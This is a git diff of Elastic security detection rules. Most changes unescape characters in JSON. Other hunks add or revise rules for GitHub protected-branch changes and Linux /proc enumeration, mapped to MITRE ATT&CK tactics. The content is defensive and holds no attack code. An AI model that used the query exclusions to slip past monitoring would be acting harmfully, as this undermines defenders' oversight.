default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json index a6b7b964408..8ad1132f538 100644 --- a/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json +++ b/packages/security_detection_engine/kibana/security_rule/074464f9-f30d-4029-8c03-0ed237fffec7_107.json @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "074464f9-f30d-4029-8c03-0ed237fffec7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json index 5d7c796a45f..2ead17335b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json +++ b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json new file mode 100644 index 00000000000..faa93f82cb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07639887-da3a-4fbf-9532-8ce748ff8c50_2.json @@ -0,0 +1,77 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects setting modifications for protected branches of a GitHub repository. Branch protection rules can be used to enforce certain workflows or requirements before a contributor can push changes to a branch in your repository. Changes to these protected branch settings should be investigated and verified as legitimate activity. Unauthorized changes could be used to lower your organization's security posture and leave you exposed for future attacks.", + "from": "now-9m", + "index": [ + "logs-github.audit-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "GitHub Protected Branch Settings Changed", + "query": "configuration where event.dataset == \"github.audit\" \n and github.category == \"protected_branch\" and event.type == \"change\" \n", + "related_integrations": [ + { + "package": "github", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "github.category", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07639887-da3a-4fbf-9532-8ce748ff8c50", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Github" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "07639887-da3a-4fbf-9532-8ce748ff8c50_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json index 615f3d6625e..66fca33e6d1 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_1.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.parent.pid : 1\n", "required_fields": [ { @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "OS: Linux", @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json index ab42f6d31b3..913ff49263e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_2.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : \"pidof\" and \nnot process.parent.pid : 1\n", "required_fields": [ { @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json index 20384b20898..8bb394db08c 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_3.json @@ -14,7 +14,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type : \"linux\" and event.category : \"file\" and event.action : \"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : \"pidof\" and \nnot process.parent.pid : 1\n", "required_fields": [ { @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json index 8f43171f22e..1ef8d7ec11e 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_4.json @@ -14,7 +14,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Proc Pseudo File System Enumeration", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", "required_fields": [ { @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json index 6ca25084653..3ae21a83094 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json index 5577129567d..1b984207c4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json index 0100ce78789..19d31158d34 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json index 13d709b977f..7c3c65fef19 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE 